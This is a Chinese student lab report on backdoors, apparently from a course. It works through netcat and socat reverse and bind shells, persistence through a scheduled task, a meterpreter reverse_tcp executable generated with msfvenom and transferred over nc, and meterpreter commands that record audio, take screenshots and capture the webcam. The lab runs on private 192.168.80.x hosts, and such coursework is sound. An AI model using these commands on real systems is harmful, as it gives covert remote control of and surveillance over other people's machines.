(1)使用netcat获取主机操作Shell,cron启动 (0.5分)
(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告
使用nc实现win,mac,Linux间的后门连接
meterpreter的应用
MSF POST 模块的应用
Kali
Windows7
1.概念
后门:是不经过正常认证流程而访问系统的通道。
潜伏于操作系统中或伪装为特定应用的专用后门程序。
用ipconfig
命令查看本机IP为192.168.80.132
关闭Windows7的防火墙。(否则ping不通)
下载ncat并进入该目录,输ncat.exe -l -p 5201
命令
(1) Windows反弹连接Linux
Linux下看到Windows的命令提示
Linux获得Win Shell
用ifconfig命令查看本机IP为192.168.80.130
Linux运行监听指令,输入命令nc -l -p 5201
Windows反弹连接Linux,在ncat目录下输入命令ncat.exe -e cmd.exe 192.168.80.130 5201
结果如下:
没有MAC设备。。
然后将开始任务设置为工作站锁定时
点击常规选项卡,输入学号
再点击操作选项卡,点击新建,程序或脚本中选择socat.exe路径,在添加参数一栏中写tcp-listen:5201 exec:cmd.exe,pty,stderr
(作用是把cmd.exe绑定到端口5201,同时把cmd.exe的stderr重定向到stdout上),点击确定保存设置
在左侧的任务计划程序里面找到20175201任务,右键点击,然后点击运行
在Kali Linux中输入socat - tcp:192.168.80.132:5201
命令,可以成功得到一个cmd shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5201 -f exe > 20175201_backdoor.exe
生成后门程序在Win7中输入ncat.exe -lv 5201 > 20175201_backdoor.exe
进入接收文件模式
在kali中输入nc -nv 192.168.80.132 5201 < 20175201_backdoor.exe
传输成功!
在Kali中打开一个终端,输入msfconsole
进入msf控制台
use exploit/multi/handler
使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcp
使用和生成后门程序时相同的payloadset LHOST 192.168.80.130
set LPORT 5201
show options
进行查看,显示设置的ip地址和端口号输入exploit
开始监听
此时在win7中运行后门程序20175201_backdoor.exe
kali获得win10的连接,并且得到了远程控制的shell
用help
查看meterpreter基本功能
用record_mic
录一段音频
输入getuid
验证用户
输入screenshot
进行截图
输入webcam_snap
照相
sudo su root
解决。??这次的实验其实并不难,动手操作起来还是很好上手的。
??我做实验和写报告的一天里,也温习了一下网课所讲的内容,加深了对这部分知识的理解。除了最后没什么意外,幸亏我提前多留了几天做实验,就怕突发情况发生。
https://www.cnblogs.com/jxxydwt1999/p/12347263.html
https://blog.csdn.net/hjing123/article/details/88849879?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158400163519195162507441%2522%252C%2522scm%2522%253A%252220140713.130056874..%2522%257D&request_id=158400163519195162507441&biz_id=0&utm_source=distribute.pc_search_result.none-task
原文:https://www.cnblogs.com/20175201zc/p/12460896.html